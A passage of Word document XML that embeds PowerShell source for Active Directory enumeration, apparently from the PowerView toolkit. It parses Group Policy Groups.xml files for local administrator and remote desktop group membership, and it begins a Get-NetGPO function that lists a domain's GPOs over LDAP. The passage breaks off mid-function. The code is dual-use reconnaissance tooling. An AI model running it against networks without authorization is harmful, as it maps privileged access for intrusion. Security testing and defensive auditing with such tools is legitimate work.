    <w:p w14:paraId="5ADDE936" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E48A392" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [XML]$GroupsXMLcontent = Get-Content $TargetGroupsXMLPath -ErrorAction Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B7E18C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1054729B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # process all group properties in the XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BD675F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073370CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B7AE7F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Groupname = $_.Properties.groupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152124B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3389D58C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # extract the localgroup sid for memberof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D232A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GroupSID = $_.Properties.groupSid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED0B01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(-not $GroupSID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CBE7E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Groupname -match 'Administrators') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208C47C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSID = 'S-1-5-32-544'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAACB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB0688E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                elseif($Groupname -match 'Remote Desktop') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7F066" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSID = 'S-1-5-32-555'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BE203E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E7C44A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                elseif($Groupname -match 'Guests') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B62210D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSID = 'S-1-5-32-546'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9AC537" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528CB27C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA82146" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSID = Convert-NameToSid -ObjectName $Groupname | Select-Object -ExpandProperty SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F117FA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B0201" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2768E67D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E5F0247" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # extract out members added to this group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE758D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F477A62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($_.sid) { $_.sid }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042ED261" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else { $_.name }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13497F60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A838D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2198E446" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if ($Members) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A214F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="455C78F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # extract out any/all filters...I hate you GPP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07987399" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($_.filters) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E975C71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Filters = $_.filters.GetEnumerator() | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC24D2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1736AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11994C57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41124FA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76861C98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Filters = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203E124" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E0E78A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="041F5B39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Members -isnot [System.Array]) { $Members = @($Members) }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FB5520" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61FD8809" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5658B22F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B8AB03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'Filters' $Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E85682E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFAA199" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50165235" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C9D1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13041D8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE9705" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F246AC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320B3C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289D9337" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4025681E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error parsing $TargetGroupsXMLPath : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76181725" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153CD4E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59BFD869" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if($UsePSDrive -and $RandDrive) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDE2D15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Removing temp PSDrive $RandDrive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7974388C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAA3C5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDA65AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B3FA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B454D6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CB7EFB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetGPO {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47742442" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9FDD94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09045C4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="075587CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Gets a list of all current GPOs in a domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7747CC83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="187DC643" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GPOname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2BB7CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24372DE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The GPO name to query for, wildcards accepted.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E8EF7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A37FF20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6143465D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6CEF5285" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The GPO display name to query for, wildcards accepted.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343DB85F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3ED6D852" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5335AA63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CD687AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return all GPO objects applied to a given computer (FQDN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2017BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="333BC5B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171BDFD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2366C1A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for GPOs, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381EE966" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14ECB278" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578752D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D8243F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09757116" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79800845" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA3082" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AB3C55D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA76E54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B407BC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03D99DD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8845EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CEF5742" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F367B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68DF21DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5322E636" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CE69807" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356352C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6AAD06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D7CA323" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B3507" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="647E3A0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGPO -Domain testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59856C12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FD197" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the GPOs in the 'testlab.local' domain. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E689301" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC5EA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D28564F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F83D12B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC287F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAA9416" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $GPOname = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFFE4E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5FFCAA96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B291953" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DisplayName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD8760" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BFF6263" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6E5B30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AD1795" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="166E6C20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2536B58F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDFEFB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FFB0A61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA041A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C439E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8AECFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB2E25B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA2903A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A83F2BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
